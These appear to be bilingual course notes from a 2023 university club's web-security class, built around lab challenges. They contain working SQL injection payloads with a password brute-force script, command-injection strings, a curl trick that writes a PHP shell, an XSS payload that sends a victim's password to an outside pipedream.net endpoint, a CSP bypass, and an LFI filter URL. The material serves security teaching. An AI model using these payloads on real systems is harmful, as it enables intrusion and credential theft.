# Bamboofox Web Security 2023 [toc] ## Tools ### Burpsuite https://portswigger.net/burp/releases/professional-community-2023-10-1-1?requestededition=community&requestedplatform= ### Python3 https://www.python.org/downloads/ #### requests ```sh pip3 install requests ``` ## HTTP requests ### Burpsuite proxy ### [Status code](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status) 1. Informational responses (100 – 199) 1. Successful responses (200 – 299) 1. Redirection messages (300 – 399) 1. Client error responses (400 – 499) 1. Server error responses (500 – 599) ### [HTTP headers](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers) ### [Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies) ### [Lab: Cat shop](https://bamboofox.cs.nctu.edu.tw/courses/16/challenges/271) ## SQL injection https://training.ching367436.me/sqlite3-viewer/ https://training.ching367436.me/sql-injection-viewer/ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md ### [Lab: Login panel (login)](https://bamboofox.cs.nctu.edu.tw/courses/16/challenges/267) ### UNION based #### [Lab: Login panel 2 (password)](https://bamboofox.cs.nctu.edu.tw/courses/16/challenges/269) #### [Lab: Login panel 2 (other table)](https://bamboofox.cs.nctu.edu.tw/courses/16/challenges/270) ##### 1. Extract table name ```sql ' UNION SELECT 1,(),3,4 -- ``` () 裡面放 `SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ` 可以選出所有這個 database 裡面的 table_name Result: ``` Users,S3cr3t_t4bl3 ``` ##### 2. Extract column name of the S3cr3t_t4bl3 ``` SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='S3cr3t_t4bl3' ``` Result: ```sql CREATE TABLE S3cr3t_t4bl3 (id INTEGER PRIMARY KEY, flag_test1234 TEXT) ``` ##### 3. Get the flag ``` SELECT flag_test1234 FROM S3cr3t_t4bl3 ``` ### Boolean based #### [Lab: Login panel (password)](https://bamboofox.cs.nctu.edu.tw/courses/16/challenges/268) ``` ' OR substr((SELECT password FROM Users WHERE username='admin'), 1, 1)='B' -- ``` 爆破腳本 ```python import requests from string import printable def f(guess,i): url = "http://bamboofox.cs.nctu.edu.tw:38300/login" a = requests.post(url,{ "username":"guest", "password":f"' OR substr((SELECT password FROM Users WHERE username='admin'),{i+1},1)='{guess}' --" }) return '2FA' in a.text res="" for i in range(128): for guess in printable: if f(guess,i): res += guess break print(res) ``` ### Other techniques - Time based - Error based - Out of bound - Write file - ... ### Tools - sqlmap ## Race condition ### [Lab: Starburst Cat Shop](https://bamboofox.cs.nctu.edu.tw/courses/16/challenges/277) #### Steps for buying a cat 1. Check if the balance is sufficient. 2. Make the cat the buyer's property. 3. balance -= cat_price ## Command injection ### Command #### Tools - [Online terminal](https://www.tutorialspoint.com/linux_terminal_online.php) - [WSL](https://learn.microsoft.com/en-us/windows/wsl/install) - Docker 去年社課：https://discord.com/channels/1003684703284498462/1003684704291143853/1082607913509584956 > 簡報連結：https://drive.google.com/file/d/1GKCqR78Hg27sgreviXyFGeeOmzFS6vpL/view?usp=share_link ### PHP - [PHP Online Server](https://replit.com/languages/php7) ### [Lab: Curl Online](https://bamboofox.cs.nctu.edu.tw/courses/16/challenges/272) - https://book.hacktricks.xyz/linux-hardening/bypass-bash-restrictions ```sh curl -s '$url'; $url = "';ls'"; curl -s '';ls''; $url = "';l's' '/"; curl -s '';l's' '/'; $url = "'; ca't' '/f''lag-415cd468353da8d26974ae6f8a7d9b30a830b8b4"; curl -s ''; ca't' '/f''lag-415cd468353da8d26974ae6f8a7d9b30a830b8b4' ``` ### [Lab: Curl Online Pro](https://bamboofox.cs.nctu.edu.tw/courses/16/challenges/275) - [linux proc](https://man7.org/linux/man-pages/man5/proc.5.html) ### [Lab: Curl Online Max](https://bamboofox.cs.nctu.edu.tw/courses/16/challenges/276) https://training.ching367436.me/shell/shell.php https://training.ching367436.me/shell/shell.php\ #### solve ``` https://training.ching367436.me/shell/shell.php' -o ching367436.php 'test ``` ```sh curl -s 'https://training.ching367436.me/shell/shell.php'\\'' -o ching367436.php '\\''test' ``` ## Front-end security ### [URL](https://www.rfc-editor.org/rfc/rfc3986#section-3) ```url http://userinfo@bamboofox.cs.nctu.edu.tw:38300/login?name=ferret#nose \__/ \_____________________________________/\____/ \_________/\__/ | | | | | scheme authority path query fragment ``` https://github.com/splitline/domain-obfuscator http://www.unicode.org/reports/tr46/#Mapping > IDNA2003 requires a mapping phase, which maps ÖBB.at to öbb.at, for example. Mapping typically involves mapping uppercase characters to their lowercase pairs, but it also involves other types of mappings between equivalent characters, such as mapping halfwidth katakana characters to normal katakana characters in Japanese. The mapping phase in IDNA2003 was included to match the insensitivity of ASCII domain names. Users are accustomed to having both CNN.com and cnn.com work identically. They expect domain names with accents to have the same casing behavior, so that ÖBB.at is the same as öbb.at. There are variations similar to case differences in other scripts. The IDNA2003 mapping is based on data specified in the Unicode Standard, Version 3.2; this mapping was later formalized as the Unicode property [NFKC_Casefold]. <!-- https://www.xudongz.com/blog/2017/idn-phishing/ --> ### HTML, CSS, JavaScript #### Tools - [Visual Studio Code](https://code.visualstudio.com/download) - [Live Server](https://marketplace.visualstudio.com/items?itemName=ritwickdey.LiveServer) ### [Same-origin policy](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy) Same-origin: Protocol, port, and host are the same. ### Cross-site scripting (XSS) #### [Lab: E-Portfolio baby](https://bamboofox.cs.nctu.edu.tw/courses/16/challenges/273) ~~https://webhook.site/~~ https://pipedream.net/ ```javascript! fetch('/api/portfolio') .then(res => res.json()) .then(data => { location = 'https://enr7kjj1uzbla.x.pipedream.net/?'+data.data.password }) ``` ```html! <img src=x onerror="fetch('/api/portfolio').then(res => res.json()).then(data => {location = 'https://enr7kjj1uzbla.x.pipedream.net/?'+data.data.password;})"> ``` 解：https://ching367436.github.io/ais3-pre-exam-2023-write-up/#E-portfolio-baby ### [Content Security Policy (CSP)](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP) https://csp-evaluator.withgoogle.com/ #### [Lab: E-Portfolio](https://bamboofox.cs.nctu.edu.tw/courses/16/challenges/274) https://e-portfolio.ching367436.me:8443/avatars/ea6209bcae582fd7a60a77dc71d624e4.svg ``` <svg xmlns="http://www.w3.org/2000/svg"> <script href="https://accounts.google.com/o/oauth2/revoke?callback=location='https://ching367436.me';"></script> </svg> ``` 解：https://ching367436.github.io/ais3-pre-exam-2023-write-up/#E-portfolio #### XSS games https://xss-game.appspot.com https://prompt.ml ## Local File Inclusion #### [Lab: Simple Site (retrieve source code)](https://bamboofox.cs.nctu.edu.tw/courses/16/challenges/278) ``` https://simple-site.ching367436.me:8443/?page=php://filter/convert.base64-encode/resource=./includes/contact.php ``` #### [Lab: Simple Site (RCE)](https://bamboofox.cs.nctu.edu.tw/courses/16/challenges/279) https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT